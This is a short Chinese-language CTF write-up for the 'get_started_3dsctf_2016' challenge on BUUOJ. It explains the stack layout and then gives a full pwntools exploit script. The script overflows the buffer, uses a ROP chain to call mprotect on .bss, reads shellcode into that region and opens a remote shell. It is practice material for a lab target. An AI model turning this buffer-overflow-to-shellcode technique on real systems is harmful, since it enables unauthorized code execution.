先checksec
这道题打远程需要改变内存权限,需要用到mprotec,这道题里也是有这个函数的
这道题有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。
padding为0x38
大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传入参数
int mprotect(void addr, size_t len, int prot);
ssize_t read(int fd,voidbuf,size_t count)
from pwn import *
from LibcSearcher import *
context(log_level = 'debug',arch ='i386',os = 'linux' )
r = remote('node3.buuoj.cn', 28905)
#r = process('./get_started_3dsctf_2016')
elf = ELF('./get_started_3dsctf_2016')
rop = ROP(elf)
bss = 0x080ea000
mprotect_addr = 0x0806EC80
read_addr = 0x0806E140
shell = asm(shellcraft.sh())
pop_3 = 0x080483b8 # pop esi ; pop edi ; pop ebp ; ret
p = flat(['a'*0x38, mprotect_addr, pop_3, bss, 0x2000, 0x7, read_addr, bss, 0, bss, 0x2000])
r.sendline(p)
r.sendline(shell)
r.interactive()